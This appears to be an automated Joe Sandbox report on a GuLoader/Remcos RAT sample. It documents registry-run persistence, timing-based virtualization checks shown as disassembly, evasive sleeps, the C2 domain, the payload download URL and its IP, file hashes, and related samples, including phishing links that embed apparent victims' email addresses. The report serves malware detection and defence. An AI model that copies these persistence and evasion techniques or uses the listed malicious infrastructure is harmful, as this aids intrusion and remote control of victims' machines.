Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

File written: C:\Users\user\AppData\Local\Temp\tmc.ini

Jump to behavior

Source: IpykYx5iwz.exe

Static file information: File size 1727984 > 1048576

Source: IpykYx5iwz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1784802321.0000000005E8C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

File created: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr

Jump to dropped file

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	File created: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	File created: C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr			Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr			Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr			Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key	Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	API/Special instruction interceptor: Address: 6793428
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	API/Special instruction interceptor: Address: 2AF3428

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	RDTSC instruction interceptor: First address: 6755CA0 second address: 6755CA0 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FD824C772E6h 0x00000008 cmp ch, ah 0x0000000a inc ebp 0x0000000b jmp 00007FD824C7734Eh 0x0000000d test dl, al 0x0000000f inc ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	RDTSC instruction interceptor: First address: 2AB5CA0 second address: 2AB5CA0 instructions: 0x00000000 rdtsc 0x00000002 test al, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FD8255F9296h 0x00000008 cmp ch, ah 0x0000000a inc ebp 0x0000000b jmp 00007FD8255F92FEh 0x0000000d test dl, al 0x0000000f inc ebx 0x00000010 rdtsc

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Window / User API: threadDelayed 1469			Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Window / User API: threadDelayed 8520			Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\IpykYx5iwz.exe TID: 4564	Thread sleep count: 1469 > 30	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe TID: 4564	Thread sleep time: -4407000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe TID: 4564	Thread sleep count: 8520 > 30	Jump to behavior
Source: C:\Users\user\Desktop\IpykYx5iwz.exe TID: 4564	Thread sleep time: -25560000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_00406444 FindFirstFileA,FindClose,	0_2_00406444
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_00405909 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405909
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 0_2_00402765 FindFirstFileA,	0_2_00402765
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_00406444 FindFirstFileA,FindClose,	1_2_00406444
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_00402765 FindFirstFileA,	1_2_00402765
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	Code function: 1_2_00405909 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	1_2_00405909

Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWW=A
Source: IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C4C000.00000004.00000020.00020000.00000000.sdmp, IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\IpykYx5iwz.exe	API call chain: ExitProcess graph end node			graph_0-3311
Source: C:\Users\user\Desktop\IpykYx5iwz.exe	API call chain: ExitProcess graph end node			graph_0-3492

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Process created: C:\Users\user\Desktop\IpykYx5iwz.exe "C:\Users\user\Desktop\IpykYx5iwz.exe"

Jump to behavior

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Code function: 0_2_00403384 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403384

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IpykYx5iwz.exe PID: 180, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\IpykYx5iwz.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-A65UIX

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000001.00000002.4140572954.0000000005C5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IpykYx5iwz.exe PID: 180, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Process Injection	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	11 Process Injection	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IpykYx5iwz.exe	66%	Virustotal		Browse
IpykYx5iwz.exe	50%	ReversingLabs	Win32.Backdoor.Remcos

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr	50%	ReversingLabs	Win32.Backdoor.Remcos

Source	Detection	Scanner	Label
https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.binL	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8	0%	Avira URL Cloud	safe
subddfg.lol	100%	Avira URL Cloud	malware
https://www.healthselflesssupplies.co.za/	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8m	0%	Avira URL Cloud	safe
https://www.healthselflesssupplies.co.za/q	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
subddfg.lol	94.156.177.164	true	true	unknown
healthselflesssupplies.co.za	164.160.91.32	true	false	unknown
www.healthselflesssupplies.co.za	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
subddfg.lol	true	Avira URL Cloud: malware	unknown
https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.healthselflesssupplies.co.za/q	IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.binL	IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	IpykYx5iwz.exe, Reaccented.scr.1.dr	false		high
https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8	IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	IpykYx5iwz.exe, Reaccented.scr.1.dr	false		high
https://www.healthselflesssupplies.co.za/	IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005C28000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.healthselflesssupplies.co.za/gmjzqcQFfx21.bin8m	IpykYx5iwz.exe, 00000001.00000002.4140363703.0000000005BE8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.164	subddfg.lol	Bulgaria		43561	NET1-ASBG	true
164.160.91.32	healthselflesssupplies.co.za	South Africa		328037	ElitehostZA	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588020
Start date and time:	2025-01-10 20:37:32 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IpykYx5iwz.exe renamed because original name is a hash value
Original Sample Name:	5aeb1293c473a66795bf0ff3a7892e6a6cf70aea5248a38f204632a5fdbe1f63.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@3/18@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 89% Number of executed functions: 53 Number of non-executed functions: 65
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target IpykYx5iwz.exe, PID 180 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:39:28	API Interceptor	3528411x Sleep call for process: IpykYx5iwz.exe modified
19:38:44	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr
19:38:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
164.160.91.32	KO0q4biYfC.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Quote Qu11262024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	Purchase-Order27112024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
subddfg.lol	z1Quotation.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	23.106.238.209

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	94.156.177.117
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	95.87.199.40
	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	93.123.77.220
	Kloki.arm7.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.x86_64.elf	Get hash	malicious	Unknown	Browse	83.222.189.67
	Kloki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.190.214
	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.spc.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.arm5.elf	Get hash	malicious	Unknown	Browse	83.222.189.126
ElitehostZA	KO0q4biYfC.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	Quote Qu11262024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	Purchase-Order27112024.scr.exe	Get hash	malicious	Remcos, GuLoader	Browse	164.160.91.32
	https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	164.160.91.32
	https://url.us.m.mimecastprotect.com/s/E9vACKrzxZSDM5kTOI6-C?domain=urldefense.proofpoint.com	Get hash	malicious	Unknown	Browse	164.160.91.37
	https://filmsinvest.com/material/?interprete=UTJGeWJXVnNidz09LFltVnlaMlYyYVdkcFlTNWpiMjA9LFkyRnliV1ZzYnk1allXNWhiR1Z6	Get hash	malicious	Unknown	Browse	164.160.91.31
	https://filmsinvest.com/material/?statement=UkdGMmFXUT0sZW1sd2NHOHVZMjl0LFpHZGhiR3hwYTJWeQ==	Get hash	malicious	Unknown	Browse	164.160.91.31
	http://www.fire.co.za	Get hash	malicious	Unknown	Browse	164.160.91.17
	https://bsigroup.apor.co.za/sgfkze/ZGF2aWQubXVnZW55aUBic2lncm91cC5jb20=	Get hash	malicious	Unknown	Browse	164.160.91.23
	https://ums.koreanair.com/Check.html?redirectUrl=TV9JRD01MTMy&U1RZUEU9TUFTUw==&TElTVF9UQUJMRT1FTVNfTUFTU19TRU5EX0xJU1Q=&UE9TVF9JRD0yMDE5MDkyMzAwMDAy&VEM9MjAxOTEwMjM=&S0lORD1D&Q0lEPTAwMg==&URL=https://harriswilliams.apor.co.za/6fh8je/Ymx1Y2FzQGhhcnJpc3dpbGxpYW1zLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	164.160.91.23

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	164.160.91.32
	ht58337iNC.exe	Get hash	malicious	GuLoader	Browse	164.160.91.32
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	164.160.91.32
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	164.160.91.32
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	164.160.91.32
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	164.160.91.32
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	164.160.91.32
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	164.160.91.32
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	164.160.91.32
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	164.160.91.32

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll	H33UCslPzv.exe	Get hash	malicious	XWorm	Browse
	sgJV11UlDP.exe	Get hash	malicious	GuLoader, XWorm	Browse
	c56D7_Receipt.vbs	Get hash	malicious	GuLoader, XWorm	Browse
	https://downloadsnew.garaninapps.com/SRTMiniServer_2.4.3_2024-02-26_INSTALL.exe	Get hash	malicious	Unknown	Browse
	5006_2.6.2.exe	Get hash	malicious	Unknown	Browse
	ocs-office.exe	Get hash	malicious	Unknown	Browse
	jU0hAXFL0k.exe	Get hash	malicious	FormBook, GuLoader	Browse
	jU0hAXFL0k.exe	Get hash	malicious	GuLoader	Browse
	#U4e5d#U6708#U58f0#U660e_40981677.xls	Get hash	malicious	GuLoader	Browse
	MaMsKRmgXZ.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\BeConf.ini

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.849204231782005
Encrypted:	false
SSDEEP:	3:1ThK5AQLQIfLBJXlFGfv:1Th9QkIPeH
MD5:	0F375612A0BD6760193A3C4991458244
SHA1:	EB53D5B0A1AF8007D55B2CD5CFE59D7B71E3C45E
SHA-256:	B4E2FF74D450A8D4FD3176A125CE941F6E6104038148AE87E01126F78904C745
SHA-512:	4E760C53C1C092B634ED20CA73E7E1A5098957939A6F8E2D361316A3E65104757343DBBC1126630AAB56F06FDB080979E311C28684185FEC236438282804FC36
Malicious:	false
Reputation:	low
Preview:	[ExPaBoot]..Acco=user32::EnumWindows(i r2 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsk70B1.tmp

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	46389745
Entropy (8bit):	0.2607043114540284
Encrypted:	false
SSDEEP:	6144:l91tPV4thxsoc1hW/33G8nk7ZtD0xHuGpwbRRYBr75TE+ZFoPgU3dKZheW2yF:7jUG8nxH2RRmFTE+ZFytKh
MD5:	08130CFCB834BC0FFE63E3334A3EC1AA
SHA1:	21DE65F7200E61BFAA18DE5631BAB75602375A70
SHA-256:	594526843DD66FBB0CCBAE1F1A8984CBDF2DCB2AA8A15A27160F6472C2A2699F
SHA-512:	A8D965AF77FA784E12E34F4E33D7912A88E56CF8E1590686BD99334A15F58DB78FAE49190AC22C6EDB02A91ACD7BF03AB203C25D31EF636B7A5015FF7E483ACB
Malicious:	false
Reputation:	low
Preview:	........,...................o................................................................................w..............................................................................................................................................................................J...N...............j...........................................................................................................................................,...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsz7B51.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.854901984552606
Encrypted:	false
SSDEEP:	192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
MD5:	0063D48AFE5A0CDC02833145667B6641
SHA1:	E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
SHA-256:	AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
SHA-512:	71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: H33UCslPzv.exe, Detection: malicious, Browse Filename: sgJV11UlDP.exe, Detection: malicious, Browse Filename: c56D7_Receipt.vbs, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: 5006_2.6.2.exe, Detection: malicious, Browse Filename: ocs-office.exe, Detection: malicious, Browse Filename: jU0hAXFL0k.exe, Detection: malicious, Browse Filename: jU0hAXFL0k.exe, Detection: malicious, Browse Filename: #U4e5d#U6708#U58f0#U660e_40981677.xls, Detection: malicious, Browse Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\subfolder1\Reaccented.scr

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1727984
Entropy (8bit):	7.996364301455999
Encrypted:	true
SSDEEP:	24576:t9tWunuwwAghUBUQyXGF8X0VMMOFdYHJStLidtLw8tWVq6VdbcGstKR18+YDQZp:NWtP4+P0Vn+dYHMwwjbV6Gst2aDQZp
MD5:	15214C528C41DE4D5E542EBD3D4AC075
SHA1:	BDAB48D323AB0E0C4689061DB5FB08ADFE1AFEC8
SHA-256:	5AEB1293C473A66795BF0FF3A7892E6A6CF70AEA5248A38F204632A5FDBE1F63
SHA-512:	02B6635E4F1A98765E65EE14DB0E93AB8DFDF4C7C0086ADDAD86E4A09466AE49DC66ACCDA0BC142828656FCA994EB99255EA4C762FFC9F6706410E4877CC9FC2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L......].................b...........3............@.................................o\....@.................................0........p..`............V..h............................................................................................text....`.......b.................. ..`.rdata..>............f..............@..@.data...8............z..............@....ndata... ...P...........................rsrc...`....p.......~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmc.ini

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	27
Entropy (8bit):	4.134336113194451
Encrypted:	false
SSDEEP:	3:iGAeSMn:lAeZ
MD5:	7AB6006A78C23C5DEC74C202B85A51A4
SHA1:	C0FF9305378BE5EC16A18127C171BB9F04D5C640
SHA-256:	BDDCBC9F6E35E10FA203E176D28CDB86BA3ADD97F2CFFD2BDA7A335B1037B71D
SHA-512:	40464F667E1CDF9D627642BE51B762245FA62097F09D3739BF94728BC9337E8A296CE4AC18380B1AED405ADB72435A2CD915E3BC37F6840F34781028F3D8AED6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Access]..Setting=Enabled..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\Afprikkendes.pse

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	7053049
Entropy (8bit):	0.15920537986619068
Encrypted:	false
SSDEEP:	768:QTcqyBjj1qaSsYNbTloIg+dMOUSFvsBxb0pPpU+ICFqCJGPPaUwoJodbe2uSS3zs:/D7Dee
MD5:	620747169DC6815B41CFAFBC1C63DE34
SHA1:	5C4188DCD3A15D4E4A6F31A372368DF2E7E894F8
SHA-256:	E67B5ED0CE69F90ABBCD1D97A13B3764EE02E3CEEC7B6451D61FA5E7527376D2
SHA-512:	E054D5AF678EDFE95D2403D793426B0CEEE39364E44A34B28D9195C10C58031FF86E2184030357EA6CAA4530306D27C97752C1CF47C842B1DB086DE21E804470
Malicious:	false
Reputation:	low
Preview:	............................................................................................................................................................................................................................................................................................................................@.........................................?.........................=...............................................................................................................................................................................................................................................................................................,......................................................................................................................................................................................................................................................................................R................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Acrimoniousness\Carettochelydidae.Fla

Download File

Process:	C:\Users\user\Desktop\IpykYx5iwz.exe
File Type:	data
Category:	dropped
Size (bytes):	282409
Entropy (8bit):	7.539089060973123
Encrypted:	false
SSDEEP:	6144:kV4thxsoc1hW/33G8nk7ZtD0xHuGpwbRRYV:QUG8nxH2RRI
MD5:	4E7C6200C8B194A91D15B4206F109CAA
SHA1:	0B06491801F962674178923392A59AE7943E7E00
SHA-256:	CA639A96999216A68DAEAB7529D09DBA8F35D4449DCD36DC036C8E8BABB3078B
